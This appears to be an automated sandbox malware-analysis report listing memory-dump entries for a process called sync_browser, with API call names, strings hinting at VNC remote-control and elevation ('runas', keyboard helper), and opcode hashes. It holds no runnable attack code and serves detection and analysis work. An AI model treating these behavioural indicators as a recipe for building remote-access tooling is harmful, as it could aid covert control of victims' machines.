                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastValue$CurrentSleepThread_errno_invalid_parameter_noinfo
                                                    • String ID: ;$;$JanFebMarAprMayJunJulAugSepOctNovDec$gfff
                                                    • API String ID: 1962487656-880385205
                                                    • Opcode ID: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
                                                    • Instruction ID: 75e6df4305201f6c7fba7616b8605ad9bb1fa0036546112d67e6c682332945b4
                                                    • Opcode Fuzzy Hash: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
                                                    • Instruction Fuzzy Hash: 779106336041818BEB099E3CC4947ECBBA1D761B48F98C136DE488B796DB3DE509C762
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: closesocketfreeinet_addrinet_ntoa$Startup_wgetenvconnectgethostbynamehtonssocket
                                                    • String ID: 0123456789.
                                                    • API String ID: 1515065793-2088042752
                                                    • Opcode ID: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
                                                    • Instruction ID: dd55f2ce79d1f59c71139cf06d545352773261e899f21ee5f85c8c7acd69e96a
                                                    • Opcode Fuzzy Hash: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
                                                    • Instruction Fuzzy Hash: 0D414161A45A918BFB34AB2198142FDA250AF58FACFC44232ED1D476D9EF3CE5468320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterInitializeLeaveSleep
                                                    • String ID: keyEvent$start_event$stop_event
                                                    • API String ID: 2894921085-1979648887
                                                    • Opcode ID: 8308cf7c3ae31cd30facc1a3198ee148bfde16ef54a6c7f1913cd50604fb2f6f
                                                    • Instruction ID: 7b1da95e25991da1d960f5c7e1c4b68fbdc6dfa024689080fb1e933eaf4db7b5
                                                    • Opcode Fuzzy Hash: 8308cf7c3ae31cd30facc1a3198ee148bfde16ef54a6c7f1913cd50604fb2f6f
                                                    • Instruction Fuzzy Hash: AA410861E19A5782FB18BB58A454B7DAB909F85F48FC00036ED4E0A6A1DF3CA845C3B5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LibraryMetricsSystem$DisplayEnumSettings$AddressFreeLoadProc
                                                    • String ID:
                                                    • API String ID: 3112530957-0
                                                    • Opcode ID: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
                                                    • Instruction ID: 0309e917b3c0332de5824e282f335a88ef5fd428ea0d9960de8244f71c68769c
                                                    • Opcode Fuzzy Hash: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
                                                    • Instruction Fuzzy Hash: 9841E8729186C18BE324DF38E44569DBBA0FB88B18F844936EF59A7749DF39D5048F20
                                                    APIs
                                                      • Part of subcall function 00007FF7D59E7BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF7D5983771), ref: 00007FF7D59E7BFE
                                                    • GetLastError.KERNEL32 ref: 00007FF7D5983790
                                                    • SetLastError.KERNEL32 ref: 00007FF7D59837B2
                                                    • FormatMessageA.KERNEL32 ref: 00007FF7D59837EB
                                                    • sprintf.LIBCMT ref: 00007FF7D5983804
                                                      • Part of subcall function 00007FF7D59EB240: _errno.LIBCMT ref: 00007FF7D59EB258
                                                      • Part of subcall function 00007FF7D59EB240: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59EB263
                                                      • Part of subcall function 00007FF7D5983690: OutputDebugStringA.KERNEL32(?,?,?,?,?,00007FF7D598385F), ref: 00007FF7D59836A9
                                                      • Part of subcall function 00007FF7D5983690: GetStdHandle.KERNEL32(?,?,?,?,?,00007FF7D598385F), ref: 00007FF7D59836D1
                                                      • Part of subcall function 00007FF7D5983690: WriteConsoleA.KERNEL32 ref: 00007FF7D59836EE
                                                      • Part of subcall function 00007FF7D5983690: WriteFile.KERNEL32(?,?,?,?,?,00007FF7D598385F), ref: 00007FF7D5983725
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFileLastTimeWrite$ConsoleDebugFormatHandleMessageOutputStringSystem_errno_invalid_parameter_noinfosprintf
                                                    • String ID: --$error code 0x%08X
                                                    • API String ID: 1897734068-3878996968
                                                    • Opcode ID: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
                                                    • Instruction ID: d0149b54aa3792a88a4e8434579d007eff210d539c47cf90ebedf45ba80bfeb7
                                                    • Opcode Fuzzy Hash: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
                                                    • Instruction Fuzzy Hash: 9831A472A0868142EB24AB25E4107AEAB60FB85FA8FD44236EF5D477C9DF3CD4058710
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __doserrno_errno
                                                    • String ID:
                                                    • API String ID: 921712934-0
                                                    • Opcode ID: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
                                                    • Instruction ID: b03f72ea3d0e39de72913f531da13f2089e4819bf075745293dc263ffef612f6
                                                    • Opcode Fuzzy Hash: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
                                                    • Instruction Fuzzy Hash: 7A21D022A1E64247F2157F64985177DAA116F82F69FC9053BEE1C072D6CF7CA881C730
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExecuteFileModuleNameShellfclose
                                                    • String ID: \uvnckeyboardhelper.exe$p$runas
                                                    • API String ID: 3322125093-2954907143
                                                    • Opcode ID: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                    • Instruction ID: b1b7598cc630aa103cc54ceeddfe68b07f99f914c970a1a0ce5ab47b5d6efbe9
                                                    • Opcode Fuzzy Hash: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                    • Instruction Fuzzy Hash: E3310E31609B8286EA64AB20F4517AEB7A4FB88B54FC00137EE9D47B95DF3CD115CB20
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __doserrno_close_nolock_errno
                                                    • String ID:
                                                    • API String ID: 186997739-0
                                                    • Opcode ID: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
                                                    • Instruction ID: 38aaf7adbd0c970f7dc0c8cc64e4aedc06b4e66c7c1f226402b5cd627fb289ed
                                                    • Opcode Fuzzy Hash: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
                                                    • Instruction Fuzzy Hash: 2211AC22E0E28247F2053B61A84127CAA50AF81FA9FDA4A37ED1D072D6CF7CA4408334
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Desktop$Thread$CloseCurrentInputMessageOpen
                                                    • String ID:
                                                    • API String ID: 1973726940-0
                                                    • Opcode ID: 74b4376dc008a2e3deaa89793efa6c2b5ae9ae972eae381437ecec0259b7ff16
                                                    • Instruction ID: 98b63cc08b16f8b44b435256f9b2e43e049379c9774a1bebd7fccab12ab69c7d
                                                    • Opcode Fuzzy Hash: 74b4376dc008a2e3deaa89793efa6c2b5ae9ae972eae381437ecec0259b7ff16
                                                    • Instruction Fuzzy Hash: 22116D25B29A5187EB18BB66A44482DE6A0AF8AFE4F840036EE4E53B58CF3CD4418710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Timer$KillMessageModePostQuitWindow
                                                    • String ID: d
                                                    • API String ID: 3664928928-2564639436
                                                    • Opcode ID: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
                                                    • Instruction ID: b4f531f7abd7286012d27f6162fb465c9424166ce5d9b8567298e154e29e921e
                                                    • Opcode Fuzzy Hash: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
                                                    • Instruction Fuzzy Hash: AC11C4A2E5861387F7647B38A41463DA690AF85BA5FC44231CD1A466E4DF3CD885C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$Long$DialogForegroundItemText
                                                    • String ID: Oct 1 2014 21:43:49
                                                    • API String ID: 2747855613-2751236551
                                                    • Opcode ID: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
                                                    • Instruction ID: a471d034317777dba6aa02116cba2052bec7e2c30e1a68f084003b2000a12aa9
                                                    • Opcode Fuzzy Hash: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
                                                    • Instruction Fuzzy Hash: 73119331A18B5287E324AB26A58457EA762FF85FD4FD84132DE8A07B98CF3CD841C714
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AsyncState$Virtual
                                                    • String ID: down$vnckeymap.cpp : new state %d (%s)$vnckeymap.cpp : setshiftstate %d - (%s->%s)
                                                    • API String ID: 2891131044-1915745809
                                                    • Opcode ID: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
                                                    • Instruction ID: 903f05ca0449c45f69abae7aa09c070b297a39781c1a0dfe2951f1632a921f0d
                                                    • Opcode Fuzzy Hash: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
                                                    • Instruction Fuzzy Hash: 61119321B28AA2C7EA146F15F4005AEAB61FFC4B49FC80432ED8E47665CF3DD915C760
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Event$ObjectResetSingleWait$CriticalEnterSection
                                                    • String ID:
                                                    • API String ID: 3343876880-0
                                                    • Opcode ID: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
                                                    • Instruction ID: e3859c60aedbc9a0ae5b95c915a751ec5f5d81461b25ff9e33904583115a912b
                                                    • Opcode Fuzzy Hash: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
                                                    • Instruction Fuzzy Hash: 28213062A28B8197EB58AB26D5842BCA720FB85F95FC04032DF1E57654CF3CE4B5C710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
